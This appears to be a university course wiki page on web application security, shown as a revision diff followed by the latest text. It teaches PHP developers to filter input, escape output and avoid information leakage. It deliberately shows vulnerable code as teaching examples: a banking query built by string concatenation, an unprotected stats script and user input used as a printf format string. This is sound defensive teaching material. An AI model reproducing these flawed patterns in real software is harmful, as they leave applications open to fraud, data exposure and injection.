Any web site that does not use the HTTPS protocol is vulnerable to packet sniffing attacks.  After the release of applications like [http://www.redmondpie.com/faceniff-app-makes-it-easy-to-hack-facebook-twitter-and-youtube-accounts-from-android-phones/ Faceniff] and [http://www.pcworld.com/article/209333/how_to_hijack_facebook_using_firesheep.html Firesheep], high-profile sites have switched to using the HTTPS protocol by default:
 
 
 
* [http://articles.economictimes.indiatimes.com/2010-01-15/news/27620470_1_gmail-encryption-email-service Gmail, January 2010]
 
* [http://archive.techtree.com/techtree/jsp/article.jsp?article_id=114302&cat_id=643 Facebook, January 2011]
 
* [http://archive.techtree.com/techtree/jsp/article.jsp?article_id=114805&cat_id=643 Twitter, March 2011]
 
 
 
== Abuse of Functionality ==
 
 
 
''Abuse of Functionality'' is a general term that refers to when an attacker exploits vulnerabilities in the logic of your application.
 
 
 
For example, suppose you were a banking site, and you had the following code to perform a transaction:
 
 
 
<source lang="php">
 
<?php
 
$mysqli->autocommit(false); // start transaction
 
$mysqli->query("UPDATE users SET balance=balance-".$amount."
 
WHERE id=".$_SESSION['user_id']);
 
$mysqli->query("UPDATE users SET balance=balance+".$amount."
 
WHERE username='".$destination_username."'");
 
$mysqli->commit(); // commit transaction
 
?>
 
</source>
 
 
 
It may not be obvious, but if you don't filter your input, it is trivial for an attacker to ''insert a negative number'' into the "amount" field and transfer money from anyone's account to his account!  The solution here is to simply filter amount for what you expect (in this case, a positive number that is not greater than the user's current balance).
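
A minimal sketch of such a filter is shown below.  The function name ''validate_transfer_amount'' and its ''$balance'' parameter are hypothetical, introduced only for illustration; the idea is simply to reject anything that is not a positive number within the user's balance before any query runs.

<source lang="php">
<?php
// Hypothetical helper: returns the amount as a float if it is acceptable,
// or null if the transfer should be rejected.
function validate_transfer_amount($raw, $balance) {
    // Reject input that is not a number at all (e.g. "abc" or an empty string)
    if (!is_numeric($raw)) {
        return null;
    }
    $amount = (float) $raw;
    // Reject zero, negative, non-finite, and over-balance amounts
    if (!is_finite($amount) || $amount <= 0 || $amount > $balance) {
        return null;
    }
    return $amount;
}

var_dump(validate_transfer_amount("25.50", 100.0)); // float(25.5)
var_dump(validate_transfer_amount("-500", 100.0));  // NULL
?>
</source>

In the transaction above, you would run this check first and refuse to start the transaction if it returns null.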
 
 
 
=== Filtering on the Client Side is Never Enough ===
 
 
 
Suppose you have an e-mail field in an HTML form, and you use some JavaScript function (or HTML5) to check that its value has the form of an e-mail address:
 
 
 
<source lang="html">
 
<input type="text" name="email" onchange="checkEmail(this);" /> <!-- HTML versions ≤ XHTML 1.0 -->
 
  
<input type="email" name="email" /> <!-- HTML versions ≥ 5 -->
</source>
 
 
 
With this filter in place, any layperson using your form is now required to submit an e-mail address in that field.  ''However'', it is trivial for an attacker to bypass this client-side filtering (e.g., by using web developer tools like Firebug) and still submit non-email text to your server.  This is why '''IT IS ESSENTIAL THAT YOU FILTER INPUT ON THE SERVER SIDE!  Any sort of filtering on the client side is just bells and whistles for the end user.'''
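
As a rough sketch of the server-side counterpart, PHP's built-in ''filter_var'' function with the ''FILTER_VALIDATE_EMAIL'' filter can repeat the check on the server.  The helper name ''clean_email'' is hypothetical and used only for illustration.

<source lang="php">
<?php
// Hypothetical helper: returns the address if it is well-formed, or null otherwise
function clean_email($raw) {
    // filter_var returns the value on success and false on failure
    $email = filter_var($raw, FILTER_VALIDATE_EMAIL);
    return ($email === false) ? null : $email;
}

var_dump(clean_email("alice@example.com"));         // the address is returned unchanged
var_dump(clean_email("<script>alert(1)</script>")); // NULL
?>
</source>

Note that this only filters the input; you still need to escape the value when you output it.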
 
 
 
=== Information Leakage ===
 
 
 
''Information Leakage'' is a noteworthy type of ''Abuse of Functionality'' attack that involves unprivileged users accessing privileged information.  In fact, Information Leakage accounts for a significant percentage of all recorded web application vulnerabilities (second only to Cross-Site Scripting).
 
 
 
The concept is relatively simple.  Suppose you have an administration page that loads an image containing a graph of all activity on your site:
 
 
 
'''admin.php'''
 
<source lang="php">
 
<?php
 
if($_SESSION['admin']) echo '<img src="stats.php?day=2012-08-19" alt="Stats for 2012-08-19" />';
 
?>
 
</source>
 
  
'''stats.php'''
 
 
<source lang="php">
<?php
// query the database, and save the results in $result

$im = new PNGraph();
$im->takeData($result);

header("Content-Type: image/png");
print $im->toString();
?>
</source>
 
Notice how you check for admin credentials in ''admin.php''.  However, you forgot to do this in ''stats.php'' itself.  An attacker could simply load ''stats.php'' directly to see all of the sensitive admin-only information!
 
 
==== Solution ====
 
 
Information Leakage is an attack that requires the developer to see the big picture and really keep track of what's going on in his or her application.  As a rule of thumb, ''whenever'' you query the database to access sensitive information, check the permissions of the user first.
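
One way to apply this rule of thumb, sketched under the assumption that the session stores an ''admin'' flag as in ''admin.php'' above, is a small helper that every sensitive script calls before doing anything else.  The name ''is_admin'' is hypothetical.

<source lang="php">
<?php
// Hypothetical helper: true only if the session data marks the user as an admin.
// Taking the session array as a parameter keeps the check easy to reuse.
function is_admin(array $session) {
    return !empty($session['admin']);
}

var_dump(is_admin(array('admin' => true))); // bool(true)
var_dump(is_admin(array()));                // bool(false)
?>
</source>

At the top of ''stats.php'', the check might then look like this:

<source lang="php">
<?php
session_start();
if (!is_admin($_SESSION)) {
    http_response_code(403); // Forbidden
    exit;
}
// ... query the database and output the graph as before ...
?>
</source>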
 
 
=== A Note about Frameworks ===
 
 
Web frameworks are designed to make web development more agile, but they in turn have security weaknesses of their own.  For instance, the infamous ''mass-assignment vulnerability'' in Ruby on Rails-type MVC frameworks is an abuse of functionality vulnerability that enables attackers to save arbitrary information in your database (!).
 
 
The important thing to know is that '''if you use a web framework, you should be familiar with the security considerations for that framework'''.  Most of the time, frameworks will have articles on their web sites that discuss these concerns.  (If your framework doesn't have a guide like this, you should probably be using a different framework!)
 
 
=== Real-Life Examples ===
 
 
* [http://www.whitec0de.com/new-hotmail-exploit-can-get-any-hotmail-email-account-hacked-for-just-20/ Hotmail, April 2012 (parameter manipulation)]
 
* [http://www.theregister.co.uk/2012/04/18/toshiba_slapped_by_ico/ Toshiba, April 2012 (parameter manipulation / information leakage)]
 
* [http://www.zdnet.com/blog/security/3-million-bank-accounts-hacked-in-iran/11577 Iranian Banks, April 2012 (information leakage)]
 
* [http://www.zdnet.com/blog/security/hacker-steals-chinese-government-defense-contracts/11386 Chinese Department of Defense, April 2012 (information leakage)]
 
* [http://articles.chicagotribune.com/2012-04-04/news/sns-rt-us-usa-hackers-utahbre83404g-20120404_1_data-security-breach-cyber-attack-hackers Utah Medicaid, April 2012]
 
  
 
== Server Configurations ==
 
 
* Use a firewall system to block unnecessary ports from public access.  The SSH and web server ports should really be the only ones you need to expose.  You should keep the web server on port 80, but you have the option of moving SSH to a port other than 22 to make it slightly more secure.
  
=== Real-Life Examples ===
+
=== Git Exposed ===
 
 
* [http://news.techeye.net/internet/4chan-vandalises-tea-party-website-reveals-private-donors Independence Hall Tea Party PAC, May 2012 (their root password was "p9ssw0rd")]
 
  
TODO: Get video from http://fileice.net/download.php?file=r426
+
Another thing to keep in mind is that by default, Apache serves up ''everything'' in your file tree, except for Apache-specific configuration files like .htaccess.  This means that if you're not careful, your .git directory can be served, exposing your raw source code to attackers, including things like database passwords! A recent study found that [http://www.jamiembrown.com/blog/one-in-every-600-websites-has-git-exposed/ one in every 600 web sites is making this mistake]. Don't be one of them!
  
  
 
[[Category:Module 2]]
 
 +
[[Category:Web Application Security]]

Latest revision as of 21:05, 18 July 2018

Application-level web security is of increasing concern among web developers. This article outlines some types of security threats to your web application and how to solve those threats.

This is Part 1 of the Web Application Security article, geared toward the material covered in Module 2. For material covered in Module 3 (MySQL), see Web Application Security, Part 2. For material covered in Module 6 (JavaScript), see Web Application Security, Part 3.

Introduction to Application-Level Web Security

Every day, computer hackers around the world penetrate web applications, often for personal profits. You may find it hard to believe, but even high-profile web sites (banks, social media, even computer security companies) are vulnerable to application-level attacks!

Not only is it embarrassing to be the programmer who wrote the vulnerable code, but it could also cost you your job. As a prudent web developer, it is imperative that you take precautionary measures to make your application difficult to penetrate. Indeed, most of the time, if your site is well-written, hackers will just move on.

Here's the golden rule: Anything in your site that accepts user input, whether via a form, an AJAX request, a file upload, or even malformed links, can be used as an attack vector. NEVER TRUST USER INPUT!!! This can be summarized in the acronym FIEO, or Filter Input, Escape Output.

FIEO in PHP

Filtering Input

"Filter Input" means that you should check that input data is of the format that you are expecting. For example, if you are expecting a number, you should cast it to a float or an int. If you are expecting a phone number, you should run it through a regular expression (you will learn regular expressions in module 4). For example:

<?php
// Cast a number to a float or an int:
$amount = (float) $_POST['amount'];

// Pass a phone number through a regular expression.
// The ^ and \z anchors require the whole string to match, not just part of it:
$phone = preg_match('/^\d{3}-\d{3}-\d{4}\z/', $_POST['phone']) ? $_POST['phone'] : "";
?>

Escaping Output

"Escape Output" means that you need to nullify, or escape, characters that have special meaning in the markup language of interest. For example, consider the following string:

If a<b and b<c then a<c.

Since a less-than sign means the start of a tag in HTML, and b is a valid tag name, the above string will not render as you might expect in HTML. Therefore, we need to escape our less-than signs by using HTML entities:

If a&lt;b and b&lt;c then a&lt;c.

The "&lt;" is an HTML entity that will render as a less-than sign. (For more information on HTML entities, read this article on the WebPlatform wiki.)

PHP provides a function that, given a string, will convert special characters to their HTML entity equivalents.

<?php
$str = "If a<b and b<c then a<c.";

// Convert special characters to HTML entities before outputting:
echo htmlentities($str);
?>

Note: htmlentities escapes a string for use in HTML, but it does not escape a string for use in other markup languages. You need to use different methods when escaping strings for other languages.

Why Not to Escape Input

Filtering your input is important, as shown above. However, it is bad practice to escape your input. For example, don't do this:

<?php
$message = htmlentities($_POST['message']); // bad practice
// then store $message in a database, etc.
?>

The reason this is bad practice is that it permanently ties that string to its final output format. For example, what if some time down the road you want to support display of that message in a PDF? You'd need to go back and remove all the HTML entities again.

This is why you should filter strings at the input stage but not escape them until the final output stage.
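
As a rough sketch of this idea, the same unescaped string can be escaped differently depending on where it ends up. The variable $message below stands in for a value that was already filtered and stored without escaping; it is an illustration only.

<?php
$message = 'Tom & Jerry <3';

// Escape for HTML only at the moment of HTML output:
echo htmlentities($message);   // Tom &amp; Jerry &lt;3

// Encode for JSON only at the moment of JSON output:
echo json_encode($message);    // "Tom & Jerry <3"
?>

Because the stored string was never escaped, each output format can apply its own rules.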

Format String Injection

If you like using functions like printf and sprintf, you may find yourself writing

printf( "%s", htmlentities($_GET['username']) ); // good example

It is tempting to reduce this to

printf( htmlentities($_GET['username']) ); // BAD example

Although the second implementation will work for most usernames, it is not correct! You are essentially making the client-provided username the format string for printf. If the username contains a percent sign (%), it will be interpreted as the start of a conversion specification in the format string, causing your script to produce errors. Worse yet, it is known that certain combinations of format parameters will actually reveal system information in the error log.

Solution

The solution is simple: never put dynamic input as the format string. It should always be static, either hard-coded or from a stable source like a YAML file. User-supplied input should always be fed into the string as arguments to sprintf and printf.

If you are outputting only one little string like in the example above, it suffices to use a PHP function like print or echo:

print htmlentities($_GET['username']); // good example
echo htmlentities($_GET['username']); // good example

Server Configurations

Sometimes hackers attempt to penetrate your application from the server side rather than the application side. Server-side security is beyond the realm of this course, but here are some things you should keep in mind.

  • Use a highly secure root password, and it should be one that you don't use anywhere else. Seriously.
  • Use a firewall system to block unnecessary ports from public access. The SSH and web server ports should really be the only ones you need to expose. You should keep the web server on port 80, but you have the option of moving SSH to a port other than 22 to make it slightly more secure.

Git Exposed

Another thing to keep in mind is that by default, Apache serves up everything in your file tree, except for Apache-specific configuration files like .htaccess. This means that if you're not careful, your .git directory can be served, exposing your raw source code to attackers, including things like database passwords! A recent study found that one in every 600 web sites is making this mistake. Don't be one of them!